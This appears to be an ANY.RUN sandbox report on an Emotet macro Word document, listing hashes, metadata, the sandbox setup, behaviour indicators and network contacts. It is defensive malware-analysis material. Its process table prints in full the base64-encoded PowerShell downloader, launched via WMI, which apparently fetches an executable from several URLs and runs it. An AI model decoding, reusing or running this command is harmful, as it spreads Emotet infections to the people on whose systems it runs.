Malware analysis Complaint from 11_05_2019.doc Malicious activity

Add for printing

File name:	Complaint from 11_05_2019.doc
Full analysis:	https://app.any.run/tasks/f04068e1-1128-4943-9e86-4dc6afb72079
Verdict:	Malicious activity
Threats:	Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. Malware Trends Tracker >>>
Analysis date:	November 08, 2019, 14:51:03
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:	macros macros-on-open generated-doc emotet-doc emotet
MIME:	application/msword
File info:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Dolorum magnam at., Author: Belo Bahno, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Nov 4 21:57:00 2019, Last Saved Time/Date: Mon Nov 4 21:57:00 2019, Number of Pages: 1, Number of Words: 37, Number of Characters: 211, Security: 0
MD5:	C88270CDCF66121C5D27BCD28584DAEC
SHA1:	44FB953A81A9CAD354EAD8323694281E09D1F825
SHA256:	DACD64F04CAF7E87BBB8214EB8ABD58C91628C08C18E8068AA1D84575F7D350A
SSDEEP:	6144:TbSRZDlzfhxYAgOLA+bPMpzCyFU+QrA/2:TbSRZDlzfNgUjbPGCMU+y

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 60 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 8.0.7601.17514 undefined
Adobe Acrobat Reader DC MUI (15.023.20070)
Adobe Flash Player 26 ActiveX (26.0.0.131)
Adobe Flash Player 26 NPAPI (26.0.0.131)
Adobe Flash Player 26 PPAPI (26.0.0.131)
Adobe Refresh Manager (1.8.0)
CCleaner (5.35)
FileZilla Client 3.36.0 (3.36.0)
Google Chrome (75.0.3770.100)
Google Update Helper (1.3.34.7)
Java 8 Update 92 (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.7.2 (4.7.03062)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Groove MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (French) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (German) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Language Pack 2010 - French/Français (14.0.4763.1000)
Microsoft Office Language Pack 2010 - German/Deutsch (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Italian/Italiano (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Japanese/日本語 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Korean/한국어 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Portuguese/Português (Brasil) (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Russian/русский (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Spanish/Español (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Turkish/Türkçe (14.0.4763.1013)
Microsoft Office O MUI (French) 2010 (14.0.4763.1000)
Microsoft Office O MUI (German) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (French) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (German) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (French) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (German) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (Arabic) 2010 (14.0.4763.1000)
Microsoft Office Proof (Basque) 2010 (14.0.4763.1000)
Microsoft Office Proof (Catalan) 2010 (14.0.4763.1000)
Microsoft Office Proof (Dutch) 2010 (14.0.4763.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Galician) 2010 (14.0.4763.1000)
Microsoft Office Proof (German) 2010 (14.0.4763.1000)
Microsoft Office Proof (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proof (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proof (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proof (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proof (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Proof (Ukrainian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Proofing (French) 2010 (14.0.4763.1000)
Microsoft Office Proofing (German) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office SharePoint Designer MUI (French) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (German) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Word MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office X MUI (French) 2010 (14.0.4763.1000)
Microsoft Office X MUI (German) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
Mozilla Firefox 68.0.1 (x86 en-US) (68.0.1)
Notepad++ (32-bit x86) (7.5.1)
Opera 12.15 (12.15.1748)
Skype version 8.29 (8.29)
Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
VLC media player (2.2.6)
WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

Client LanguagePack Package
Client Refresh LanguagePack Package
CodecPack Basic Package
Foundation Package
IE Troubleshooters Package
InternetExplorer Optional Package
KB2534111
KB2999226
KB4019990
KB976902
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
ProfessionalEdition
UltimateEdition

Add for printing

MALICIOUS
No malicious indicators.
SUSPICIOUS
- PowerShell script executed
  - powershell.exe (PID: 3976)
- Creates files in the user directory
  - powershell.exe (PID: 3976)
- Executed via WMI
  - powershell.exe (PID: 3976)
INFO
- Creates files in the user directory
  - WINWORD.EXE (PID: 1160)
- Reads Microsoft Office registry keys
  - WINWORD.EXE (PID: 1160)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.doc	\|	Microsoft Word document (54.2)
.doc	\|	Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Tag_MarkAsFinal:	-1
CodePage:	Windows Latin 1 (Western European)
HeadingPairs:	Title 1
TitleOfParts:	-
HyperlinksChanged:	No
SharedDoc:	No
LinksUpToDate:	No
ScaleCrop:	No
AppVersion:	16
CharCountWithSpaces:	247
Paragraphs:	1
Lines:	1
Company:	-
Security:	None
Characters:	211
Words:	37
Pages:	1
ModifyDate:	2019:11:04 21:57:00
CreateDate:	2019:11:04 21:57:00
TotalEditTime:	-
Software:	Microsoft Office Word
RevisionNumber:	1
LastModifiedBy:	-
Template:	-
Comments:	-
Keywords:	-
Author:	Belo Bahno
Subject:	-
Title:	Dolorum magnam at.

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
1160	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Complaint from 11_05_2019.doc"	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	—	explorer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000
3976	powershell -enco JABPAGEAeQBwAHoAZAB5AG8APQAnAEIAdgB2AGcAbQBpAGoAaABsAHQAawAnADsAJABHAHkAbwBxAHYAZwBsAGYAcwBwAHkAbgBqACAAPQAgACcANgA3ADEAJwA7ACQAWgBkAGsAYwBhAHQAeQBqAHAAdAA9ACcAVgBkAGgAcwBoAGsAcABhAHQAawBwAHkAZwAnADsAJABWAHEAcgBsAHMAYQB3AGYAeAB0AHQAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEcAeQBvAHEAdgBnAGwAZgBzAHAAeQBuAGoAKwAnAC4AZQB4AGUAJwA7ACQARgB4AHIAcwB4AG8AbgBxAHcAcwB3AD0AJwBSAHMAZwBiAHAAcABuAGcAegAnADsAJABRAGMAZAByAGIAcgBiAGQAcgBsAG0APQAmACgAJwBuAGUAdwAtAG8AJwArACcAYgBqAGUAYwAnACsAJwB0ACcAKQAgAE4ARQB0AC4AVwBFAGIAQwBsAGkAZQBuAHQAOwAkAEYAdgBvAHQAdQBlAHEAYgA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGkAbwBpADMALgBjAG8AbQAvAGUAdABxAGcAYwAvAHEAagBYAEcAYQBLAHoAYgB1AC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGUAbgB0AG8AcgBzAHAAZQBkAGkAYQAuAGMAbwBtAC8AegB2AG0AMQAvAGIAZwBkAEgARgBhAGYAZQAvACoAaAB0AHQAcAA6AC8ALwBkAGUAdgAuAHIAdgBhAHQAZQBjAGgALgBvAHIAZwAvAHcAcAAtAGEAZABtAGkAbgAvAEIAawBQAHQATQB1AFgAaAAvACoAaAB0AHQAcABzADoALwAvAGwAZQB2AGUAbAA3ADUANwAuAGMAbwBtAC8AcAByAG8AagBlAGMAdABzAC8AYQBkAHYAYQBuAGMAZQBkAC8AawAyADQAZABrAHMAZwBvAC0AagBkADMANQBoAHEAbQAtADAAMgA3ADAANAA1ADUALwAqAGgAdAB0AHAAOgAvAC8AdABhAGsAYQBzAGEAZwBvAC0AawBpAHQAYQAuAGMAaABpAGIAaQBrAGsAbwAtAGwAYQBuAGQALgBqAHAALwB3AHAALwBjAHkAbQBvAGIAZwBjAHEAMgAtAGQAegB4AC0ANQA1ADUALwAnAC4AIgBzAHAAbABgAEkAVAAiACgAJwAqACcAKQA7ACQAWgBiAGwAcgBwAG8AbQB2AHQAZQA9ACcAWABhAHUAaQBpAG0AbAB6AGwAdwAnADsAZgBvAHIAZQBhAGMAaAAoACQAUwBtAGoAYwBjAHAAaABhAGoAZwBjAGgAZgAgAGkAbgAgACQARgB2AG8AdAB1AGUAcQBiACkAewB0AHIAeQB7ACQAUQBjAGQAcgBiAHIAYgBkAHIAbABtAC4AIgBkAE8AdwBOAGAAbABvAGAAQQBEAGAARgBJAGwARQAiACgAJABTAG0AagBjAGMAcABoAGEAagBnAGMAaABmACwAIAAkAFYAcQByAGwAcwBhAHcAZgB4AHQAdAApADsAJABBAGQAbgBpAHIAdABpAGYAZQBnAD0AJwBDAHYAYQBoAGYAYQB0AGEAeQBoAGoAYgAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAFYAcQByAGwAcwBhAHcAZgB4AHQAdAApAC4AIgBMAGAAZQBOAGcAVABIACIAIAAtAGcAZQAgADMANgA3ADUAMwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAYABBAHIAdAAiACgAJABWAHEAcgBsAHMAYQB3AGYAeAB0AHQAKQA7ACQAVABvAHUAegBjAHIAYgBxAGwAPQAnAEUAegB3AG0AZwBxAGgAeQBnACcAOwBiAHIAZQBhAGsAOwAkAEQAdABrAGQAagBrAHQAdQBtAG0APQAnAE8AcgBrAGcAcQBlAGEAZQBwAGgAYgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABFAG0AYQBzAHQAeABhAHMAaABrAGEAbwA9ACcAUQB4AHIAbwByAHQAawBoAHUAJwA=	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe		wmiprvse.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255)

Add for printing

Total events

1 878

Read events

1 115

Write events

Delete events

Modification events

No data

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
1160	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\CVRAB5D.tmp.cvr		—
		MD5:—	SHA256:—
3976	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YX5O42GRLZSHNCL2I8ZB.temp		—
		MD5:—	SHA256:—
1160	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9EC061EF.wmf		wmf
		MD5:4901FDA4D969892496D9C32CAF950699	SHA256:B0AE0083038CF002A9D51E390FE7CB8238AA2AFF3A9A255074F1CCE0256798D0
1160	WINWORD.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm		pgc
		MD5:6AAB9CA27F6D3E541292196F7C5B86F3	SHA256:EE1618B82D891F8400937A45217EF20AF3427A36F945447E05537ACC0315DD03
1160	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4F4518D2.wmf		wmf
		MD5:C72BCFED6D45D52620986B885CE8B254	SHA256:D137B038410A9F4EF2E57FB3D06BDC23C366C313D8411BE53EAA43CA989AC81D
1160	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D593F0D5.wmf		wmf
		MD5:D46477AF55E11A5874F5C1CA693591B2	SHA256:C187D180FCF20B438D0CD6B43A1FD8002DD01870A53EAD1CA9F6531B8BF3726F
1160	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FAE7EEAB.wmf		wmf
		MD5:3F2B6EDBAF5EA79369FC31A079DEAC39	SHA256:425D5507AE5FF861610E1EED8D723936C1F6391B07453F591AD3208CA7D82845
1160	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1A0040FC.wmf		wmf
		MD5:EBEC1715A9B54681B9AA046B43B00706	SHA256:675EF5DAC133FB8820F00867D477B909DCB207CC170C8A93C1FAC84A7799B65D
1160	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\~$mplaint from 11_05_2019.doc		pgc
		MD5:8138EC10E1147AF0E07929CC3D035A29	SHA256:352C8C27FCA27D2C22D6C59F3401277192880A302DDF99FEFF1EFE5BEED1AA9B
1160	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8F6368F1.wmf		wmf
		MD5:8BF461A284F325A8156EC0B6A341AAE9	SHA256:EAD1A9103DA2FBC72D8CCD61E68B5BCFB4CC45D2383CB725E00DD20E31A5719F

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

No HTTP requests

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
3976	powershell.exe	172.1.1.1:80	www.ioi3.com	AT&T Services, Inc.	US	unknown
3976	powershell.exe	198.12.145.239:443	www.mentorspedia.com	GoDaddy.com, LLC	US	suspicious

DNS requests

Domain	IP	Reputation
www.ioi3.com	172.1.1.1	suspicious
dns.msftncsi.com	131.107.255.255	shared
www.mentorspedia.com	198.12.145.239	suspicious

Threats

No threats detected

Add for printing

No debug info

General Info

Complaint from 11_05_2019.doc

C88270CDCF66121C5D27BCD28584DAEC

44FB953A81A9CAD354EAD8323694281E09D1F825

DACD64F04CAF7E87BBB8214EB8ABD58C91628C08C18E8068AA1D84575F7D350A

6144:TbSRZDlzfhxYAgOLA+bPMpzCyFU+QrA/2:TbSRZDlzfNgUjbPGCMU+y

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

SUSPICIOUS

PowerShell script executed

Creates files in the user directory

Executed via WMI

INFO

Creates files in the user directory

Reads Microsoft Office registry keys

Malware configuration

Static information

TRiD

EXIF

FlashPix

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings